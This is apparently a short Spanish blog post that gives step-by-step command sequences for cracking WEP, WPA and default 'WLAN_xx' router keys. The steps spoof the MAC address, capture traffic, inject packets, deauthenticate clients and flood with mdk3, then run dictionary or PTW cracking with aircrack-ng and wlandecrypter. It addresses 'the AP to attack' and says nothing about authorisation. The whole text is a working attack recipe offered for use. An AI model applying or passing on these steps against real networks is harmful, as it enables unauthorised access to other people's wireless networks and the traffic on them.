Seguridad Wireless

WEP

airmon-ng stop wlan0
ifconfig wlan0 down
macchanger --mac 00:11:22:33:44:55 wlan0
airmon-ng start wlan0
airodump-ng wlan0
airodump-ng -w paco --bssid 00:A0:C5:80:4A:D4 --channel 1 wlan0
aireplay-ng -1 0 -a 00:A0:C5:80:4A:D4 -h 00:11:22:33:44:55 -e Paco wlan0 (TIENE KE ASOCIARSE, XKE LO MAS SEGURO KE SI NO SE ASOCIA TODO LO DEMAS NO VAYA)
aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 00:A0:C5:80:4A:D4 -h 00:11:22:33:44:55 wlan0
aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 wlan0
aircrack-ng(ptw) (nombre de la captura).cap



------esto es cuando no hay clientes-------
1º> iwconfig
2º> macchanger
3º> airodump-ng (interfaz ke sea)
4º> airodump-ng -c (canal ke sea) -w (nombre de archivo ke keramos) (interfaz)
5º> aireplay-ng -1 30 -e (nombre de ESSID) -a (MAC del AP a atacar) -h (nuestra MAC falsa) (interfaz)
6º> aireplay-ng -3 -b (MAC a atacar) -h (nuestra MAC falsa) (interfaz)
7º> aircrack-ptw (nombre del archivo ke elegimos antes)-01.cap
y en segundos FOUND KEY
espero ke le sirva a alguien.
.................................................

WPA
iwconfig wifi0 channel 6
airmon-ng start wlan0
airodump-ng wlan0
airodump-ng -w paco --bssid 00:A0:C5:80:4A:D4 --channel 6 wlan0
ifconfig (nombre del router) channel 6
aireplay-ng -0 -5 -a(bssid) ((-c FF:FF:FF:FF:FF:FF) si ay cliente ai ke ponerlo) wlan0
mdk3 eth1 x 0 -n ESSID -t mac
aircrack-ng (nombre captura con handshaker).cap -w (nombre diccionraio)
macchanger -a bssid wifi0
# zcat all.gz | egrep -v '^#' > dic(se supone ke crea un diccionario de 9 megas)

wlan_xx

airmon-ng stop wlan0
ifconfig wlan0 down
macchanger --mac 00:11:22:33:44:55 wlan0
airmon-ng start wlan0
airodump-ng wlan0
airodump-ng --bssid 00:01:38:76:66:80 -w captura eth1
aireplay-ng -1 0 -a 00:A0:C5:80:4A:D4 -h 00:11:22:33:44:55 -e Paco wlan0 (TIENE KE ASOCIARSE, XKE LO MAS SEGURO KE SI NO SE ASOCIA TODO LO DEMAS NO VAYA)
aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 00:A0:C5:80:4A:D4 -h 00:11:22:33:44:55 wlan0
aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 wlan0
wlandecrypter (00:01:38:76:66:80) (WLAN_23) diccionario
aircrack-ng -w diccionario captura.cap
http://tubalmartin.googlecode.com/svn/trunk/html/EWFInet.html

No hay comentarios: